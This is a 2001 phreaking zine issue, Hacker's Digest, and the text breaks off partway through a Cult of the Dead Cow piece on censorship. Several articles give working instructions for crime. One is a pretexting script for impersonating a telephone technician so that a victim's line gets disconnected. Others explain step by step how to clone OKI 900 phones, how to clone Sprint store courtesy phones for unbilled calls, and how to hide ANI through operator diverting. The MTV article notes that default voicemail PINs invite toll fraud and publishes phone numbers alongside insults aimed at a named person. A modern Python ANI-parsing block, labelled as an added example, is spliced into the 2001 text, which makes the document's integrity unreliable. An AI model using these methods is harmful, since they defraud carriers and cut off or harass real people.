Text File | 2002-05-27 | 120.0 KB | 2,312 lines |
-
-
-
- H A C K E R ' S D I G E S T
- ----------------------------------------------------------------------
- www.hackersdigest.com
- SUMMER 2001 ISSUE 1
-
-
-
-
- Da Wutang
-
- =============================================*
- |Hello World
- ============
- |Hacker's Digest Focus Cap 'n Crunch
- ====================================
- |The New AT&T Network
- =====================
- |The Art of the Force Out
- =========================
- |OKI 900 Reprogramming/Cloning in a Nutshell
- ============================================
- |Exploring Sprint PCS
- =====================
- |Exploring MTV Telecom
- ======================
- |International Bookburning in Progress
- ======================================
- |Digital Multiplexing System
- ============================
- |Cross Site Scripting the Security Gap
- ======================================
- |Shell/PPP Connectivity over Cellular Networks
- ==============================================
- |Nortel Millenium Payphones
- ===========================
- |Writing Buffer Overflow Exploits
- ==================================
- |What You Don't Know Will Hurt You
- =============================================*
-
-
-
-
- +==============================================================================+
- | Get The Latest Issues |
- | Join the Mailing List |
- | --------------------- |
- | E-mail hd-request@hackersdigest.com with the word subscribe in the |
- | subject line. |
- +==============================================================================+
-
-
-
-
- =========================[ Hello World ]=========================
-
-
-
- It's here, the first issue of Hacker's Digest, sixty pages of kung fuck
- that you would be stupid not to read. You might be asking yourself just
- what the hell we are trying to do. Our goal is to provide solid
- information to the hacker/phreaker community. Hackers you say? Those punk
- kids who billed $5,000 dollars to my credit card? Fuck no... We are not
- here to defend, support or encourage petty crimes that are done with
- computers. We are about cutting edge technology, how technology works,
- its faults, and how it affects our lives. We are about learning and answering
- questions that you can't ask anywhere else.
-
- Now that you know what we are about, let me explain how we operate.
- We offer a one year subscription for $15.00 and a two year subscription for
- $30.00. We also have the magazine online for free. Why do we sell the magazine
- and offer it for free? We need the support. Hacker's Digest operates
- off of a shoestring budget and we need your support to keep us running.
-
- There are other ways to support Hacker's Digest. We need letters, articles,
- and comments to tell us what you want to see in Hacker's Digest. Everything
- you send to us will be read, so send it in. The fact is that we need to
- know that you are out there, and we are going to keep putting issues out
- and paying the bills as long as we know people are out there giving a damn
- about what we are doing.
-
- So how important is it to have a magazine that supports freedom of speech?
- With new laws being passed such as the Digital Millennium Copyright Act,
- cameras in the streets scanning everyone's face against a database
- populated from DMV records, and more worms being released into the wild,
- feeding the fire about "Cyber Terrorism"... you tell me.
-
- You will not see banners or paid advertisements of any sort on our web site
- or in our magazine. We are not about making money. We are about providing
- to the hacking/phreaking community that has provided so much to us. To
- educate our peers who have educated us.
-
- You will notice that this issue does not have any letters in it. Well, it's
- our first issue, so what do you expect? In the future we will offer ten pages
- of letters, so send them in. There is little chance they will not get printed.
- We are also accepting any type of art you could send in: drawings, logos,
- and covers, as well as ideas for any covers you might have. Anything will
- help.
-
- We could not have gotten this together in time without support from a lot
- of friends. Special thanks to PPC (www.ppchq.org) and Phone Geeks
- (www.phonegeeks.com), all of our writers, and everyone who helped to make
- this happen.
-
-
-
- ===========[ Hacker's Digest Focus Cap 'n Crunch ]===============
-
-
-
- Who is Cap 'n Crunch
-
- Cap 'n Crunch has to be one of the most well known phone phreaks to go down
- in history. You may have come across his name in a text file or heard him
- speak at H2K on the Old Timers panel. According to Cap 'n Crunch, his first
- adventure into phone phreaking came when he received a call from a blind kid
- who had heard him on the radio from a home made transmitter. He asked the
- kid for his phone number and called him back; to his surprise it was a
- loop.
-
- He visited the blind kid at his house, and the kid wanted to know if Cap 'n Crunch
- could build him an MF'er, which is a box that plays 6 tones: 700, 900, 1100,
- 1300, 1500, and 1700 Hz. This is widely known as a blue box. The kid called
- an 800 number and then seized a trunk with his organ.
-
- Calling a conference line that could only be accessed if you owned a blue box,
- Cap 'n Crunch would talk hours on end about the phone system with other phone
- phreaks. If they found a problem in the phone system such as a sick trunk, they
- would call the phone company and report the problem. They would get responses
- such as "We've been trying to trace down that stuck tandem for months, how did
- you find it?". They even had the phone company thinking they worked for them.
-
- Cap 'n Crunch's Arrest
-
- In 1971 there was an article in the San Jose Mercury about a guy selling blue
- boxes to members of organized crime. The phone company then tapped the
- conference line and soon the guy was arrested. To get back at the phone company
- he got in touch with Ron Rosenbaum, who wrote the article "The Secret of the
- Little Blue Box" that is easy to find on the internet to this day. Ron Rosenbaum
- got in touch with the blind kid for interviews. Without knowing that Cap 'n
- Crunch did not want to have anything to do with Ron Rosenbaum, the blind kid
- told him everything. Cap 'n Crunch ran to a news stand and was shocked at all
- the errors in the article. He just knew the FBI was going to come for him so
- he completely stopped everything.
-
- In 1972 Cap 'n Crunch stopped at a 7-11; as soon as he got out of his car he
- was jumped by 4 men who threw him against the car, handcuffed him and read
- him his rights.
-
- Serving Time
-
- Cap 'n Crunch served his time at Lompoc minimum security prison. He bought a
- radio and modified it to pick up the prison guards' walkie-talkies. He would
- have a friend wait for him on a loop and would three-way other people from
- there. In jail he showed other inmates how to build cheese boxes. He said it
- was a challenge to teach people who could hardly read or write how to build
- things such as laser bug detectors, etc. Cap 'n Crunch volunteered to work
- in the pig stables. He said that since he grew up on a farm and really liked
- animals he did not mind the labor. Teaching other inmates was a way to
- keep his mind occupied and make time go a little faster. It also helped his
- popularity and kept him from having to do the shittiest jobs.
-
- Cap 'n Crunch and Apple
-
- If you decide to visit Cap 'n Crunch's web site you will see his support for
- Apple as a secure operating system, but his roots with Apple go further
- than that. After the article "The Secret of the Little Blue Box" came out, Steve
- Wozniak, co-founder of Apple Computers, wanted to contact him. Steve Wozniak
- contacted Cap 'n Crunch and it was not long before he talked him into visiting
- UC Berkeley. When he went to Steve Wozniak's dorm, he also found Steve Jobs and
- Bill Klaxton waiting for him. He explained how to use it and, better yet, what not to
- do with it. He told Steve Wozniak not to sell blue boxes, but he did not listen
- and made enough money to pay for school and finance the Apple I project.
-
- Cap 'n Crunch's Second Arrest
-
- Yes, Cap 'n Crunch was arrested a second time. He was friends with a great social
- engineering artist named Adam. Adam contacted Cap 'n Crunch and talked him into
- visiting him. He had broken into COSMOS. This was the phone company's computer
- system and had the power to do anything. Adam visited him a few more times. Cap
- 'n Crunch would take him to potluck dinners hosted by People's Computer
- Company. When he was at a food market Adam flagged him down to a pay phone
- and put it in his face to talk to a friend, not knowing how the call was paid for.
- In 1974 Cap 'n Crunch was arrested again. Come to find out, Adam had sold him
- out to the FBI and had a pay phone tapped so it was like he blue boxed the call.
- He also found out that Adam got a few other people busted who would not have
- gotten back into blue boxing if Adam had not contacted them.
-
- Pranking the President
-
- Cap 'n Crunch found a way to listen in on ongoing conversations the same way the
- operator can break into a call if it's an emergency. Cap 'n Crunch was scanning
- the 202 area code, which was for the Washington area. They found the CIA Crisis
- hot line. They tapped the number and heard people talking who they were sure were
- CIA. They soon found the code word that would connect them to the president.
- They called up and heard someone say "9337". Cap 'n Crunch's friend said "Olympus
- please!", the man at the other end said "One moment sir!" and sure enough a man that
- sounded a lot like Nixon said "What's going on?". His friend said "We have a
- crisis here in Los Angeles!", Nixon said "What's the nature of the crisis?", his
- friend said in a serious tone of voice "We're out of toilet paper sir!". Nixon
- said "WHO IS THIS?" and his friend hung up. No one knows what happened to the tapes.
-
- Cap 'n Crunch Now
-
- Cap 'n Crunch is currently working on his own business, web hosting and his new
- firewall Intrusion Detection System called the "Crunch Box" that is built on
- OpenBSD. His web hosting service has to be the most secure I have ever
- seen. His whole network is running Mac OS, and we all know how many security
- holes there are for the Mac.
-
- I asked him what he thought about phone phreaking groups such as Phone Losers of
- America and he thought they were great. He also said they contacted him and
- asked if he would link to their site. He checked it out and thought they were
- worth the link. I also asked him, if given the chance, would he do it all again.
- He told me without a doubt.
-
- Cap 'n Crunch honestly had to be one of the nicest phone phreaks I have ever
- met. It's clear that all the hype his name has is well deserved and has not even
- gone remotely close to his head, and if you have a chance to email him I would.
- He has to be the most interesting person I have ever met.
-
- http://www.webcrunchers.com
-
-
-
- =====================[ The New AT&T Network ]=====================
- =====================[ by Lucky225 ]=====================
-
-
- It seems that AT&T was not too fond of my ANI Spoofing article that appeared in
- 2600 (17:4). Just a few days after I picked up a copy of the new 2600 and saw
- that my article had been printed, I started noticing a lot of changes in the
- AT&T network. First they shut off their 800 ANAC; a few days later, calls that
- were routed to 800-673-7286 by the Verizon Long Distance operator were handled
- strangely. I began noticing that if I made a call through the Verizon Long
- Distance operator to 800-673-7286, I could place calls to 800 numbers NOT on the
- AT&T network, but the ANI was being sent as '615-986-9873' or as ANI II pair
- 23 followed by area code 904. Thus, calls placed through the Verizon Long
- Distance operator to AT&T's 800-operator could not be used to spoof ANI any
- more. The 615 number belongs to a PBX owned by AT&T in Nashville, TN. I could
- still spoof ANI on the AT&T network if I diverted through my local operator or
- various other 101XXX long distance carrier operators, but this April it stopped
- working.
-
- I soon figured out what was happening. AT&T has centers all around the
- country, including Alaska and Hawaii. The way SS7 works, depending on where you're
- calling from, an 800 number can be routed to various different places. For example,
- there could be a nationwide 800 number that allows you to call from anywhere in
- the country, but a person that calls that 800 number from Florida could
- get routed to that business's office on the east coast, and a person that calls
- from California may get routed to the west coast office. That's what it's like
- when you call 800-673-7286: you get routed to the AT&T center nearest to you
- to take the call. So when I was making a call through the Verizon Long Distance
- operator to 800 673 7286 I would get routed to the Florida AT&T center, because
- the Verizon Long Distance operator I got was based out of Florida (813), which is
- why when I had the AT&T operator dial an ANAC it would show 23-904 (Florida).
- However, not all Verizon Long Distance operators are based in Florida; some of
- them are based out of Kentucky (606), which for whatever reason will get you the
- Nashville, TN center. The Nashville center is the only center I have seen so far
- that transmits ANI with ANI II pair "00" and a full 10 digit phone
- number (615-986-9873).
-
- The AT&T Centers: As I mentioned, there are various AT&T centers throughout the
- country, and they are also the centers that handle the automated AT&T Long
- Distance operator services as well as 800-call-att and 800-operator. With the
- new upgrade that AT&T is implementing (widespread across the country by now, I
- predict), each center is getting a total makeover. There will be no more ANI
- spoofing to AT&T numbers; they are updating these centers so that you can call
- any 800 number through the AT&T carrier. Calls to 800 673 7286 that have an ANI
- fail will no longer use the phone number you give as ANI when calling other toll
- free numbers. Instead, ANI II pair 23 and the area code of the AT&T center will
- be used. However, the best part is that you can place calls to toll free numbers
- without speaking to an operator. Simply dial 10-10-ATT-0 (10-10-288-0) and enter
- the toll free number you want to call. The ANI will show up as ANI II pair 23
- and the area code of the AT&T center: op diverting without even having to speak
- to the op! However, you will notice that if you try to dial 800-call-att or
- 800-673-7286 it will appear that your ANI still shows up; this is because these
- numbers are handled by the same AT&T center. Any toll-free number not
- handled by the AT&T center (basically any toll-free number that's not used for
- AT&T operator services) will be processed with your ANI not being transmitted.
-
- There are a few advantages and disadvantages of this new system. The only real
- disadvantage is that you can not spoof ANI any more. The advantages, however, are
- that you can place calls to basically any toll free number you wish without your
- ANI being passed, simply by dialing 10-10-ATT-0 and then pressing in the toll
- free number you want to call at the AT&T prompt. You can even use this at
- payphones to call toll free numbers that don't allow payphone calls or to get
- around payphone surcharges. Op diverting used to be so hard: local ops not
- wanting to help you out, 101XXX carrier ops only being reachable
- from certain parts of the country, and the real downside being that you had to
- talk to an operator, who by the way might listen in on your call, when trying
- to divert to toll free numbers. Now, thanks to AT&T's new network, you
- can reach anywhere in the country by simply dialing 10-10-288-0 (or even just 00
- if you have AT&T), and you don't even have to talk to an operator; you just punch
- in the toll free number you want to call on your touch tone keypad. You can even
- divert to that toll-free number whose carrier you always wanted to know using your
- modem, by setting your modem to dial 10-10-288-0, 1-800-xxx-xxxx, without fear
- of your ANI showing up. I'm sure AT&T logs your ANI
- and probably would take action if you were harassing a toll-free number long
- enough, but for now you can think of 10-10-288-0 as your own free ANI blocking
- service.
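- The flip side of everything above is what this means for whoever runs the
- toll-free number on the receiving end: ANI can arrive as a real 10-digit line
- with II pair "00", or as II pair "23" plus nothing but the area code of the
- AT&T center that handled the call. The following is an added example, not code
- from this article or from AT&T or Verizon, showing how a toll-free service
- should treat the two shapes: parse the II pair, and refuse to map a call to a
- customer record unless the ANI is a complete, subscriber-originated number.
- The digit-string layout and the choice of "00" as the only accepted pair are
- assumptions of the example; the 615 and 904 values come from the article.

```python
"""ANI II handling for a toll-free service: added example, not code from the
article or from AT&T/Verizon.

With Feature Group D signalling, the calling number arrives as a two-digit
"ANI II" information pair followed by the number itself.  The article shows
two shapes of ANI reaching toll-free destinations:

  * II "00" followed by a full 10-digit number (a normal subscriber line), and
  * II "23" followed by only the 3-digit area code of the AT&T center that
    handled the call, which says where the call was processed, not who called.

The defensive lesson is that ANI is routing metadata, not authentication.
Assumptions (not from the article): ANI is modelled here as a plain digit
string, and "00" is the only II pair this code accepts as identifying a
subscriber; anything else is treated as unverified.
"""
import re
from dataclasses import dataclass
from typing import Dict, Optional

# NANP rule: neither the area code (NPA) nor the exchange (NXX) may start with 0 or 1.
NANP_NUMBER = re.compile(r"^[2-9]\d{2}[2-9]\d{6}$")


@dataclass(frozen=True)
class AniRecord:
    ii: str                  # two-digit ANI II information pair
    digits: str              # whatever followed the II pair
    full_number: bool        # a complete, well-formed 10-digit number arrived
    caller_identified: bool  # safe to treat `digits` as the calling line
    note: str


def parse_ani(raw: str) -> AniRecord:
    """Split a delivered ANI string into its II pair and number part and classify it."""
    s = re.sub(r"\D", "", raw)
    if len(s) < 2:
        raise ValueError("ANI string too short to contain an II pair")
    ii, digits = s[:2], s[2:]
    full = bool(NANP_NUMBER.match(digits))
    if ii == "23":
        # Article: the AT&T center substitutes II 23 plus its own area code.
        return AniRecord(ii, digits, full, False,
                         "carrier operator center; digits describe the center, not the caller")
    if not full:
        return AniRecord(ii, digits, False, False, "ANI incomplete or malformed")
    if ii == "00":
        return AniRecord(ii, digits, True, True, "subscriber line, complete number")
    # Other II pairs exist; this example does not treat any of them as verified.
    return AniRecord(ii, digits, True, False,
                     f"II pair {ii} not accepted as a verified subscriber line")


def lookup_account(raw_ani: str, accounts: Dict[str, str]) -> Optional[str]:
    """Map an incoming call to a customer record by ANI, or return None.

    Only a complete, subscriber-originated ANI is allowed to match, so a call
    that reached us via an operator center (II 23 + area code) never resolves
    to someone else's account.
    """
    rec = parse_ani(raw_ani)
    if not rec.caller_identified:
        return None
    return accounts.get(rec.digits)


if __name__ == "__main__":
    # Constructed account table; the 615 number is the AT&T PBX the article mentions.
    accounts = {"6159869873": "account-A"}
    for sample in ("00 615-986-9873", "23 904", "00 615"):
        rec = parse_ani(sample)
        print(f"{sample!r:20} II={rec.ii} identified={rec.caller_identified} "
              f"account={lookup_account(sample, accounts)}  ({rec.note})")
```

- The point of `lookup_account` refusing anything but II "00" is exactly the
- situation the article describes: a call arriving with "23" and "904" tells the
- called party which AT&T center processed it, nothing more, so any system that
- keyed access or billing off ANI alone was trusting a field the network itself
- does not vouch for.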
-
- Reference: This is a follow up to an article in 2600 17:4 titled "Confusing ANI
- and Other Phone Tricks".
-
-
-
- =====================[ The Art of the Force Out ]=====================
- =====================[ by herf ]=====================
-
-
-
- You may have read texts on social engineering cheeseburgers from McDonald's, but
- that is not what this paper is about. I will go into getting a circuit busied
- out using your telco's dumbass repair techs.
-
- I'm sure your question has shifted to how? It's actually pretty simple.
-
- Ok, I'll go over having a person's line busied out.
-
- Before accomplishing this, you'll need to understand what having a circuit
- busied out means. When out on a job, field technicians have to get a circuit
- disconnected for a short period of time before working on the line. Why?
- Because 110 volts of electricity surges through the circuit when phones ring.
- Basically, if you were holding both tip and ring and the circuit tried to
- connect a call, you'd be unpleasantly shocked out of your mind. So, to avoid
- lawsuits from their field techs, telco tech support enables circuits to be
- remotely severed.
-
- Now, you'll need to make an identity for yourself. As for myself, I most
- commonly refer to myself as Chris Knight and use an employee ID I found in Bell
- Atlantic's trash. I have fake voices I use to connect personally with whatever
- repair tech I talk to. If it's a black man or woman, I speak using a black man's
- accent with a touch of Southern. If it's a white man or woman, I speak like a
- redneck. The reason I do this is to fool the repair tech into thinking I'm
- beneath them, into thinking that my intellectual capacity is that of a carrot.
- Why? Because if they think their time is more important than mine, they'll
- become impatient and do whatever I want them to.
-
- The engineering aspects of having someone's circuit busied out are pretty
- mindless. Get your telco's field tech support number, for one. Social
- engineering it out of the CO is pretty easy. All you have to do is ask to speak
- with a supervisor, tell him you're out on a ticket, you're new and the presets
- on your set aren't working correctly. If he asks where your reference sheet is,
- tell him it's buried underneath your equipment somewhere. If he still resists,
- tell him you're already in overtime and you need to get in touch with field tech
- support before working on the line. When he hears the term "Overtime" he'll
- oblige because he's a nazi.
-
- Ok, make sure to op divert to the field tech support toll free number because
- you don't want to go to jail. Once connected, enter whatever menu number it
- is to speak with a repair technician. When the repair tech gives the cute little
- welcome spiel, ask their name again to show you care. When you speak, make
- sure you sound like a disgruntled employee to relate with them. Announce your
- name and ID number. If you don't have one, they're usually 3 digits. Just make
- one up. If they say it's not listed, tell them you just got out of training.
- Anyway, open the conversation like this: "Hey, what's your name again? - Oh, ok.
- Well (blank), I'm out on a trouble ticket and I need to get a circuit forced
- out." - They'll ask why you haven't called your CO to get it done. That's when
- you say, "Well, I tried calling my CO but the line has been busy for 30 minutes.
- Same with the WMC. I'm already on overtime and my foremer (foreman) doesn't like
- that so I took desperate measures. Can you help me out or transfer me to someone
- who can, please?"
-
- When they say yes, you're in. It's only a matter of sounding authentic. If
- you can't sound authentic, you probably shouldn't be doing this anyway.
-
- Ok, so now you know and knowing is the first step to serious jail time.
-
- Oh, below I'll list some acronyms that might help to authenticate yourself.
-
- WMC - Work Maintenance Center (Verizon+)
- WAC - Work Assessment Center (BellSouth - appended by khecka)
- NOC - Network Operations Center
- IR - Tech ID
- Trouble Ticket - Issued to field technicians to identify different jobs.
- Former (Foreman) - Boss
- SISSYTECH - Slang for a technician who only does house repair.
- Force Out - Busy Out
-
- Peace and Fleece. One step closer to having your sheep ID revoked.
-
-
-
- ==============[OKI 900 Reprogramming/Cloning in a Nutshell]==============
- ==============[ by dark_fairytale ]==============
-
-
-
- Ok, so you've read the Oki 900 Guide by Iceberg and you still don't fully
- understand how to reprogram/clone your Oki 900. Well, now I'm going to explain in
- the simplest terms possible just how to do that, for those of you that
- still don't understand.
-
- Materials Needed:
-
- Oki 900 with 4712 Chip Modification
- A Valid ESN and NAM Pair (ESN should already be in hex)
-
- Ok, now if you don't know what an ESN and NAM pair is then you shouldn't be
- reading this. However, if you do, continue on. The very first thing you'll need
- to do is to put your Oki 900 into test mode/debug mode by doing the following:
- Power up the phone. Hold down the 7 and 9 buttons for about a second, release.
- Quickly enter Menu, Snd, End, Rcl, Sto, Clr. The phone should now read Good
- timing!!! If not, start over. If all goes well up until here hit the 1 and 3 buttons
- at the same time and it will clear the Good timing from the display. Ok, now
- you're ready to program in your ESN. You have 5 locations for ESN if you are
- using the 4712 chip mod and you will have to program in each byte of ESN
- separately in its own location in order for it to work. To begin
- programming the ESN into the phone: hit #54 followed by the 4 digit location
- followed by the byte of ESN, then Snd.
-
- Every ESN location is as follows:
-
- -Esn 1 Locale- BE8E BE8F BE90 BE91
-
- -Esn 2 Locale- BE93 BE94 BE95 BE96
-
- -Esn 3 Locale- BE98 BE99 BE9A BE9B
-
- -Esn 4 Locale- BE9D BE9E BE9F BEA0
-
- -Esn 5 Locale- BEA2 BEA3 BEA4 BEA5
-
- Now you may be looking at this and still wondering, what the fuck? Ok, let me
- explain more clearly here. An ESN is an 8 digit/letter number combination when
- properly put into hex mode, which will be needed when reprogramming the ESN. When
- reprogramming the ESN you will enter it two digits/letters at a time into the Oki.
- For example, let's say your ESN is: BD94-A623 and you want to program that into
- ESN Slot 1. Therefore you would program: BD into location BE8E, 94 into BE8F,
- and so on.... Ok, I hope that helps a little for you beginners. When
- reprogramming your ESN more than likely you will have to program in a letter. To
- get letters all you simply need to do is hit the * key on the phone before
- hitting the corresponding number. Here is a key for that as well:
-
- STAR KEY A=*1 B=*2 C=*3 D=*4 E=*5 F=*6
-
- One last quick note on reprogramming the ESN: hit # before each entry and send to
- save it before you move on. Ok, now after you get the full ESN programmed in you
- will have to reboot the phone. So simply turn the phone off for a second or two
- and turn it back on. Now comes reprogramming the NAM. As soon as you power up
- the phone you will have to: Hold Rcl and Mnu at the same time for a second or
- two, release. Quickly follow with *,6,2,7,2,9,8,5,4,#. If entered correctly some
- numbers will pop up on the display followed by the word Dealer, which means just
- that: you are in Dealer mode and your NAM is ready to be reprogrammed. Ok, now
- use the volume button on the side to scroll down to the NAM corresponding to the
- ESN you just programmed in. Let the display sit there for a second and the
- prompt Own # will then come up. Now re-enter the NAM that you have for your ESN
- and hit STO. With that being done hit the Down Volume button three times and you
- should see a prompt that reads ACCOLC #. Here you need to enter 0 followed by
- the last digit of the NAM you are programming in and hit STO once more. Once
- that is done shut the phone off once more to reboot and power it back on. Now
- you are ready to select your NAM and ESN from the Admin Menu to put it to use.
- When the phone powers back up hit Menu 8 times for the Admin Menu to appear. Hit
- Rcl to access it and enter your security code. The default password on most
- phones is 123456, but please note that it can be changed. Once into the Admin
- menu hit RCL to choose the NAM you want to use and hit STO and the prompt should
- appear: RESET TIMER. Turn the phone off and turn it back on and you're almost
- done. Now getting the ESN and NAM to work properly may take some experimenting
- with the carrier selection, which varies from A to B. Most A side carriers are
- hard to clone due to RF fingerprinting. To access the carrier selection again hit
- Menu 8 times and go into the Admin menu. Enter your password and hit the Down
- volume arrow button until you see System Prefer followed by whichever
- carrier is selected. Hit STO to select. Try your pair with A; if that doesn't
- work simply go back and try with B. If that doesn't work, then you have a bad
- pair and should go out and get another. Ok, I hope this text file has helped
- those who have had trouble understanding the concept of reprogramming/cloning
- the OKI 900 with 4712 MOD, and if it hasn't then I strongly suggest you find a
- new hobby. Thanks for reading.
-
- References: The Complete Oki 900 Guide by Iceberg.
-
- Shouts: PPC UP$ P.O.T.S. Plexus Liquid Illusion Comic_1 DrDaedlus Redxer
- HateServ
-
- the list goes on and on......
-
-
- =====================[ Exploring Sprint PCS ]=====================
- =====================[ by Okiwan ]=====================
-
-
-
- Introduction
-
- Here's a sweet exploit I came up with while waiting in line at the
- Sprint PCS store. First a little back story: Sprint PCS is a digital CDMA
- network, making it virtually impossible to clone... or so we thought. The weakness
- of Sprint's network is that their digital coverage is pathetic. To fill up the
- HUGE holes in their network, Sprint has roaming agreements throughout the US.
- The roaming agreement is that whenever there isn't a digital signal (1900) the
- phones will drop to analog (800), which is what Sprint calls "roaming".
-
- THE EXPLOIT
-
- Every Sprint PCS store has a sales floor where they have activated
- phones that you can pick up and use. Sprint stores do that so you can try out
- their phones to hear the sound quality of each different phone before you buy
- one, or to call home (or anyone) as a courtesy call. In fact, every time I go to a
- Sprint store I always make at least 15-20 prank calls all over the US.
-
- Basically all you need to do is:
- 1) Go through the menu and look for the phone's telephone number, which is your
-    MIN (mobile ID number).
- 2) Look at the back of the phone and find an 8 character number/letter sequence;
-    this is your ESN.
- 3) Program the ESN and MIN into your analog OKI-900 phone.
-
- Guess what, you just cloned the Sprint PCS courtesy phone. So when you use your
- cloned OKI-900 phone, Sprint PCS will think you're roaming, since you're using an
- analog only phone.
-
- These phones are activated with unlimited calling minutes and I doubt that the
- Sprint PCS store looks through the hundreds of phone calls that are made from
- these phones each month, so there's little to no chance of getting caught.
- There's like 7-8 different models out right now so you should get all 7-8
- accounts and use 'em like crazy.
-
-
- =====================[ Exploring MTV Telecom ]=====================
- =====================[ by dark_fairytale ]=====================
-
-
-
- MTV. You all know the name. You've all probably watched it at one time or
- another. Who hasn't? One day this past spring, I happened to be watching MTV.
- In fact it was an episode of Total Request Live. If you haven't seen this show
- (which most of you probably have), I'll cover the premise briefly. Carson Daly
- hosts this live daily show from MTV Studios in New York, NY, which basically
- caters to the teeny bopper fad of boy bands and Britney Spears. Every once in a
- brief while you might actually see a real band in a video, but very rarely. Go
- figure. Anyways, I'm sitting there watching this show, TRL, when they say
- they're gonna have a contest. WOWIE! A contest that will go something like this:
- in every top 10 video there will be a hint/clue/question asked and the answer is
- a number. When all the numbers are revealed, you will have the phone number for
- the TRL Studio Phone, which is no more than ten feet away from Carson Daly's fat
- head.
-
- Now normally, I wouldn't be impressed with their cheesy contests, but this one
- somehow piqued my interest. Imagine having the number to that phone to disrupt
- their live show day after day to constantly harass Carson Daly. Oh what fun that
- would be! Eh! I had to have this number. So I raced for a pen and paper and sat
- through the whole damn show jotting down number after number. But before the
- show had ended, I remembered someone mentioning to me before that MTV/Viacom
- had its very own exchange in New York. Why such a company would have its very
- own exchange is beyond my comprehension, but 'tis true. The Viacom exchange is
- 212 846. I had these first six numbers because I already had a number within
- MTV studios that I knew was legit.
-
- So on with the contest, with my cheating going on already. Well, turns out MTV
- decided to give everyone a chance to win the contest earlier than expected by
- having the number 2 video question, "how many times is rollin said in the
- following video, Limp Bizkit's Rollin?", equal the last 2 digits of the
- phone number. Up to this point, I had all the numbers correct. But somehow the
- light gleaming off of Fred Durst's bald head threw me off and I got confused and
- blew that. Foiled again! After someone rang the phone next to Carson Daly, they
- scrolled the number for the phone by on the screen and I quickly jotted it down.
- I raced for the phone to give Carson Daly a call.
-
- I quickly dialed 212 846 5581. The phone rings a couple times and a woman
- answers. So I say, "Hello." She says, "Who is this?" so I reply with, "Uhhhhh,
- who is this??" She then proceeds to yell at me and say, "THEY MESSED UP! QUIT
- CALLING! THEY GAVE OUT THE WRONG NUMBER ON THE AIR!" and slams the phone down.
-
- What? MTV messed up and gave out one of their MTV employees' phone numbers
- instead? Apparently so, since I obviously wasn't the first confused person this
- woman had talked to and she was obviously ticked off about the whole ordeal, but
- someone had rung the MTV phone to claim their prize. So was it just a mix up on
- the winner's behalf? Was the whole contest rigged? I'm still not sure, to tell
- you the truth, and I don't really care, but this is what started my mission.
-
- My mission really had no climax or finality to it. I was just determined to come
- up with some interesting phone numbers in the MTV/Viacom system by demon dialing
- the exchange. I also made it a real point to come up with that "secret" MTV TRL
- phone number so I could talk to Carson during the show.
-
- Anyways after hours of dialing and dialing I finally realized that MTV had a ton
- of people working for them I never heard of. Useless people that probably no one
- in the world had even heard of to tell you the truth. I also discovered that MTV
- uses a Nortel Meridian system for its telephony needs. We all know just how fun
- these can be to play with. If you don't know what I'm talking about, let me
- explain. Nortel manufactures these wondrous devices which are installed with
- default, usually 4 number, pins. What that means is the pin for a 4 digit
- mailbox will match the login if it isn't changed by the owner. You can usually
- crack into these babies within ten minutes using random guessing at numbers and
- a little common sense. Did I also fail to mention that some Meridians are
- equipped with outdialing features? I think you know what I'm getting at. One
- could easily rack up tons of toll fraud on MTV's behalf if they really wanted to
- and with what I'm sure is a multi-million dollar network, they would probably
- never even notice.
-
- Anyways, back to the story. I'm dialing around and dialing around when I finally
- realize this is completely useless. The chances of me finding anyone famous'
- number is a long shot at the rate I'm going. So what do I do? I give up.
-
- What does it matter? I already have Serena Altschul's MTV number and it's not
- that hard to run across on the internet if you know the right people. I've
- talked to her on a couple occasions and may I say, she is not the most
- courteous person on the telephone. Serena, if you're reading this, I don't like
- you. Just thought I would say that.
-
- So what have I learned here? I've learned that MTV does in fact have their own
- exchange in New York, for reasons unknown to me. MTV's telephone network operates
- off a Nortel Meridian System. MTV pays a lot of useless people to sit around all
- day, and I have a few interesting numbers. So I have this text file now of names
- and numbers at MTV Viacom and I've narrowed the numbers down to what I think may
- be the TRL phone. My guess is: 212 846 5781 (which usually rings and rings. Did
- they turn the ringer off? Rats, foiled again.) but I'm pretty sure they could
- change the thing if they really wanted, which is a total letdown nonetheless.
- Failure, curiosity, and sore fingers. It's all in a day's work for this common
- phreak.
-
-
- =================[INTERNATIONAL BOOKBURNING IN PROGRESS]==================
- =================[ by Cult of the Dead Cow ]==================
-
-
-
- Free speech is under siege at the margins of the Internet. Quite a few countries
- are censoring access to the Web through DNS [Domain Name Service] filtering.
- This is a process whereby politically incorrect information is blocked by domain
- address -- the name that appears before the dot com suffix. Others employ
- filtering which denies politically or socially challenging subject matter based
- on its content.
-
- Hacktivismo and the CULT OF THE DEAD COW have decided that enough is too much.
- We are hackers and free speech advocates, and we are developing technologies to
- challenge state-sponsored censorship of the Internet.
-
- Most countries use intimidation and filtering of one kind or another, including
- the People's Republic of China, Cuba, and many Islamic countries. Most claim to
- be blocking pornographic content. But the real reason is to prevent challenging
- content from spreading through repressive regimes. This includes information
- ranging from political opinion, "foreign" news, women's issues, academic and
- scholarly works, religious information, information regarding ethnic groups in
- disfavor, news of human rights abuses, documents which present drugs in a
- positive light, and gay and lesbian content, among others.
-
- The capriciousness of state-sanctioned censorship is wide-ranging. [1]
-
- * In Zambia, the government has attempted to censor information revealing their
- plans for constitutional referendums.
-
- * In Mauritania -- as in most countries --, owners of cybercafes are required to
- supply government intelligence agents with copies of e-mail sent or received at
- their establishments.
-
- * Even less draconian governments, like Malaysia, have threatened web-publishers
- for violating their publishing licenses by publishing frequent updates: _timely,
- relevant_ information is seen as a threat.
-
- * South Korea's national security law forbids South Koreans from having any
- contact -- including contact over the Internet -- with their North Korean
- neighbors.
-
- * Sri Lanka threatened news sites with possible revocation of their licenses if
- coverage of a presidential election campaign was not partial to the party of the
- outgoing president.
-
- The risks of accessing or disseminating information are often great.
-
- * In Ukraine, a decapitated body found near the village of Tarachtcha is
- believed to be that of Georgiy Gongadze, founder and editor of an on-line
- newspaper critical of the authorities.
-
- * In August, 1998, eighteen year old Turk Emre Ersoz was found guilty of
- "insulting the national police" in an Internet forum after participating in a
- demonstration that was violently suppressed by the police. His ISP provided the
- authorities with his address.
-
- * Journalist Miroslav Filipovic has the dubious distinction of having been the
- first Journalist accused of spying because of articles published on the Internet
- -- in this case detailing the abuses of certain Yugoslav army units in Kosovo.
-
- We are sickened by these egregious violations of information and human rights.
- The liberal democracies have talked a far better game than they've played on
- access to information. But hackers are not willing to watch the custodians of
- the International Convention on Civil and Political Rights and the Universal
- Declaration of Human Rights turn them into a mockery. We are willing to put our
- money where our mouth is.
-
- Hacktivismo and the CULT OF THE DEAD COW are issuing the HACKTIVISMO DECLARATION
- as a declaration of outrage and a statement of intent. It is our Magna Carta for
